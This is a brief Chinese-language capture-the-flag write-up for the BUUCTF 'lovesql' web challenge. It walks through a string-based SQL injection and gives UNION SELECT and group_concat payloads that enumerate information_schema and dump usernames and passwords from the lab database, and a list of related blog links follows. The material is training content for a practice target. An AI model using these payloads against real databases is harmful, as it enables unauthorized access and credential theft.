47,【5】BUUCTF web lovesql

进入靶场

可知是单引号闭合,属于字符串型注入

则后续方法与字符串型无异

使用order by 判断出字节数为3

使用union select寻找注入点时切记第一个select为空

库名geek

表名group_concat(table_name) from information_schema.tables where table_schema='geek'#

geekuser l0ve1ysq1

字段名group_concat(column_name) from information_schema.columns where table_name='l0ve1ysq1'#

id username password

group_concat(column_name) from information_schema.columns where table_name='geekuser'#

可知两个表字段名相同

查询字段内容

group_concat(id,username,password) from geek.l0ve1ysq1#

group_concat(id,username,password) from geek.geekuser#

得到flag

笔记

1,本题考查字符串类型的注入

2,group_concat(id,username,password) from geek.geekuser#

一次可以爆出表格所有内容

相关推荐
island131425 分钟前
【Redis#9】其他数据结构
数据结构·数据库·redis
言之。37 分钟前
Django REST框架:ModelViewSet全面解析
数据库·python·django
-Xie-40 分钟前
Mysql杂志(十四)——Mysql逻辑架构
数据库·mysql·架构
西贝爱学习1 小时前
数据库系统概论的第六版与第五版的区别
数据库·oracle
emma羊羊3 小时前
【SQL注入】延时盲注
数据库·sql·网络安全
一叶飘零_sweeeet3 小时前
从 MySQL 到 TiDB:分布式数据库的无缝迁移与实战指南
数据库·mysql·tidb
axban3 小时前
QT M/V架构开发实战:QStandardItemModel介绍
开发语言·数据库·qt
没学上了3 小时前
数据库建立库-Qt
数据库
程序员小羊!4 小时前
大数据电商流量分析项目实战:Spark SQL 基础(四)
大数据·sql·spark
我是zxb4 小时前
EasyExcel:快速读写Excel的工具类
数据库·oracle·excel